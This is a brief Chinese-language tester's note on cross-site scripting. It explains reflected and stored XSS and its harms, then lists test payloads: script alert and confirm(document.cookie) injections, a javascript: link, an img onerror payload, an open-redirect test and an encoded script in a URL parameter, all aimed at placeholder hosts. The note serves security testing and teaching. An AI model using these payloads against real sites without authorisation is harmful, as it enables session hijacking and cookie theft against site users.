测试的时候会涉及到xss测试,下面简要整理下xss的知识
xss跨站脚本特点就是能注入恶意的HTML/JS代码到用户浏览器,劫持用户会话,如果确认存在漏洞,会随着注入的内容不同而产生危害比如:窃取cookie,网页挂马,恶意操作,跨站蠕虫等等
分类:
反射型:非持久,一般为一个url,需要用户单击,在url中参数传入
持久型:常存在于评论等交互中,常见于<textarea>这种标签,可用于挂马钓鱼渗透等
可见,为了防止xss,字符过滤可以有效的较少被攻击的危害,但是xss攻击不止这么简单,
它还可以绕过服务端的xss过滤!!!待续
ps:常用的xss攻击语句列表
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 英文
http://drops.wooyun.org/tips/1955 中文
如果可以发现最基础的xss可以执行,那么就可以注入其他有害的操作或者获取信息
例如一些javacript事件:onerror,onfocus,onclick,ontimeout。。。
http://wenku.baidu.com/link?url=q9-QLRlKm788Hdn7F0-Fy2Ujqg8N995-DLk4cS_cXdds1h9lQIvtGf78KbUM55GtKiS6qTwd--Aj6YSsEh2YmiB4VZ611J3pwdj0AeSeApi
--------------------------------------------------------------------------
/***********工作中用到渗透语句:******************/
1. 跨站攻击
输入框测试
<--测试方法-->
(1)<a href="javascript:alert(1)"/>我的评论</a>
(2)cookies
"/><script>confirm(document.cookie)
<script>confirm(document.cookie)</scr
(3)<script>alert(1)</script>
2. URL跳转漏洞
<--测试方法-->
修改参数中的合法URL为非法URL,然后查看是否能正常跳转或者响应包是否包含了任意的构造URL
例子:
(1)http:/xxx.com.cn/post.do?retUrl=javascript:alert(document.cookie)
直接注入到URl里面了
(2)访问http://xxx.com.cn/login.do?retUrl=http://www.baidu.com
登录后即可跳转到www.baidu.com
3. 存储型跨站
<--测试方法-->
会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在
例子:
在页面源代码中修改回复内容添加
<img src=http://xxx.com.cn/tesad.gif οnerrοr=alert(666) />
4.参数跨站
<--测试方法-->
http://xxx.com.cn/usr/user.jsp?param_prov=&gender=&prov=&city=&birthday=%3Cscript%3Ealert%281%29%3C/script%3E